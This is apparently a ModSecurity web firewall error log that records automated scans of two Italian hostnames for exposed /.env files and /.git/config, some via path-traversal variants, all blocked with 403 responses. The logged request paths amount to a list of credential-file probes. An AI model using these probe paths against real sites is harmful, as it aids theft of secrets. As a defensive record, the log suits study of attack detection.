[Sat Nov 16 17:00:14.671424 2024] [:error] [pid 3359976] [client 45.148.10.172:35176] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzjBjuTFm8cL074W6xpKJAAAAAk"]
[Sat Nov 16 17:00:14.672089 2024] [:error] [pid 3359976] [client 45.148.10.172:35176] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzjBjuTFm8cL074W6xpKJAAAAAk"]
[Sat Nov 16 17:00:14.672512 2024] [:error] [pid 3359976] [client 45.148.10.172:35176] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzjBjuTFm8cL074W6xpKJAAAAAk"]
[Sat Nov 16 17:06:28.974145 2024] [:error] [pid 3359975] [client 109.205.213.242:40048] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZzjDBLKqyzmZfjSMkn8GIwAAAAg"]
[Sat Nov 16 17:06:28.974855 2024] [:error] [pid 3359975] [client 109.205.213.242:40048] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZzjDBLKqyzmZfjSMkn8GIwAAAAg"]
[Sat Nov 16 17:06:28.975293 2024] [:error] [pid 3359975] [client 109.205.213.242:40048] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZzjDBLKqyzmZfjSMkn8GIwAAAAg"]
[Sat Nov 16 17:06:29.430337 2024] [:error] [pid 3359974] [client 109.205.213.242:40052] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZzjDBUDsRMk5i-d_jANjBQAAAAc"]
[Sat Nov 16 17:06:29.430919 2024] [:error] [pid 3359974] [client 109.205.213.242:40052] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZzjDBUDsRMk5i-d_jANjBQAAAAc"]
[Sat Nov 16 17:06:29.431342 2024] [:error] [pid 3359974] [client 109.205.213.242:40052] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZzjDBUDsRMk5i-d_jANjBQAAAAc"]
[Sat Nov 16 17:06:30.067540 2024] [:error] [pid 3351108] [client 109.205.213.242:40056] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/production/.env"] [unique_id "ZzjDBtuN5sdnSQc3ix4sjQAAAAs"]
[Sat Nov 16 17:06:30.068127 2024] [:error] [pid 3351108] [client 109.205.213.242:40056] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/production/.env"] [unique_id "ZzjDBtuN5sdnSQc3ix4sjQAAAAs"]
[Sat Nov 16 17:06:30.068553 2024] [:error] [pid 3351108] [client 109.205.213.242:40056] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/production/.env"] [unique_id "ZzjDBtuN5sdnSQc3ix4sjQAAAAs"]
[Sat Nov 16 17:06:30.638998 2024] [:error] [pid 3359973] [client 109.205.213.242:59424] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "ZzjDBmF7VaCzeovAvhArfQAAAAY"]
[Sat Nov 16 17:06:30.639407 2024] [:error] [pid 3359973] [client 109.205.213.242:59424] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "ZzjDBmF7VaCzeovAvhArfQAAAAY"]
[Sat Nov 16 17:06:30.639644 2024] [:error] [pid 3359973] [client 109.205.213.242:59424] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "ZzjDBmF7VaCzeovAvhArfQAAAAY"]
[Sat Nov 16 17:06:31.083018 2024] [:error] [pid 3359977] [client 109.205.213.242:59426] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/staging/.env"] [unique_id "ZzjDB3rT8W4xifl9wIBLLAAAAAw"]
[Sat Nov 16 17:06:31.083619 2024] [:error] [pid 3359977] [client 109.205.213.242:59426] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/staging/.env"] [unique_id "ZzjDB3rT8W4xifl9wIBLLAAAAAw"]
[Sat Nov 16 17:06:31.084084 2024] [:error] [pid 3359977] [client 109.205.213.242:59426] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/staging/.env"] [unique_id "ZzjDB3rT8W4xifl9wIBLLAAAAAw"]
[Sun Nov 17 05:41:59.508773 2024] [:error] [pid 3368396] [client 45.148.10.123:50706] [client 45.148.10.123] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zzl0FzXg56NcKc-8l0FHkQAAAAU"]
[Sun Nov 17 05:41:59.509550 2024] [:error] [pid 3368396] [client 45.148.10.123:50706] [client 45.148.10.123] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zzl0FzXg56NcKc-8l0FHkQAAAAU"]
[Sun Nov 17 05:41:59.510054 2024] [:error] [pid 3368396] [client 45.148.10.123:50706] [client 45.148.10.123] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zzl0FzXg56NcKc-8l0FHkQAAAAU"]
[Sun Nov 17 15:13:12.569407 2024] [:error] [pid 3370338] [client 216.245.184.125:39386] [client 216.245.184.125] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zzn5-ItN8Fx1_F3WiUqMQgAAAAc"]
[Sun Nov 17 15:13:12.569838 2024] [:error] [pid 3370338] [client 216.245.184.125:39386] [client 216.245.184.125] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zzn5-ItN8Fx1_F3WiUqMQgAAAAc"]
[Sun Nov 17 15:13:12.570146 2024] [:error] [pid 3370338] [client 216.245.184.125:39386] [client 216.245.184.125] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zzn5-ItN8Fx1_F3WiUqMQgAAAAc"]
[Sun Nov 17 23:12:26.188443 2024] [:error] [pid 3386431] [client 45.148.10.172:50026] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzpqSksENrDzGr7aL2wm5gAAAAg"]
[Sun Nov 17 23:12:26.190112 2024] [:error] [pid 3386431] [client 45.148.10.172:50026] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzpqSksENrDzGr7aL2wm5gAAAAg"]
[Sun Nov 17 23:12:26.190619 2024] [:error] [pid 3386431] [client 45.148.10.172:50026] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzpqSksENrDzGr7aL2wm5gAAAAg"]
[Sun Nov 17 23:56:41.834395 2024] [:error] [pid 3386427] [client 179.43.189.138:55206] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /scripts/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/scripts/.git/config"] [unique_id "Zzp0qQ5EWeoyGe8h9FctLQAAAAI"]
[Sun Nov 17 23:56:41.836380 2024] [:error] [pid 3386427] [client 179.43.189.138:55206] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/scripts/.git/config"] [unique_id "Zzp0qQ5EWeoyGe8h9FctLQAAAAI"]
[Sun Nov 17 23:56:41.836835 2024] [:error] [pid 3386427] [client 179.43.189.138:55206] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/scripts/.git/config"] [unique_id "Zzp0qQ5EWeoyGe8h9FctLQAAAAI"]
[Sun Nov 17 23:56:41.840310 2024] [:error] [pid 3372500] [client 179.43.189.138:55218] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/content../.git/config"] [unique_id "Zzp0qSXNrulCFj7TKS97HwAAABU"]
[Sun Nov 17 23:56:41.840667 2024] [:error] [pid 3372500] [client 179.43.189.138:55218] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/content../.git/config"] [unique_id "Zzp0qSXNrulCFj7TKS97HwAAABU"]
[Sun Nov 17 23:56:41.840963 2024] [:error] [pid 3372500] [client 179.43.189.138:55218] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/content../.git/config"] [unique_id "Zzp0qSXNrulCFj7TKS97HwAAABU"]
[Sun Nov 17 23:56:41.843297 2024] [:error] [pid 3368396] [client 179.43.189.138:55232] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/media../.git/config"] [unique_id "Zzp0qTXg56NcKc-8l0FICAAAAAU"]
[Sun Nov 17 23:56:41.843616 2024] [:error] [pid 3368396] [client 179.43.189.138:55232] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/media../.git/config"] [unique_id "Zzp0qTXg56NcKc-8l0FICAAAAAU"]
[Sun Nov 17 23:56:41.843858 2024] [:error] [pid 3368396] [client 179.43.189.138:55232] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/media../.git/config"] [unique_id "Zzp0qTXg56NcKc-8l0FICAAAAAU"]
[Sun Nov 17 23:56:41.847330 2024] [:error] [pid 3372501] [client 179.43.189.138:55246] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/events../.git/config"] [unique_id "Zzp0qcPhACgxtlj_6Rz5cQAAABY"]
[Sun Nov 17 23:56:41.847852 2024] [:error] [pid 3372501] [client 179.43.189.138:55246] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/events../.git/config"] [unique_id "Zzp0qcPhACgxtlj_6Rz5cQAAABY"]
[Sun Nov 17 23:56:41.848279 2024] [:error] [pid 3372501] [client 179.43.189.138:55246] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/events../.git/config"] [unique_id "Zzp0qcPhACgxtlj_6Rz5cQAAABY"]
[Sun Nov 17 23:56:41.848448 2024] [:error] [pid 3372499] [client 179.43.189.138:55260] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/static../.git/config"] [unique_id "Zzp0qTQl9SjVY23u354zcwAAABQ"]
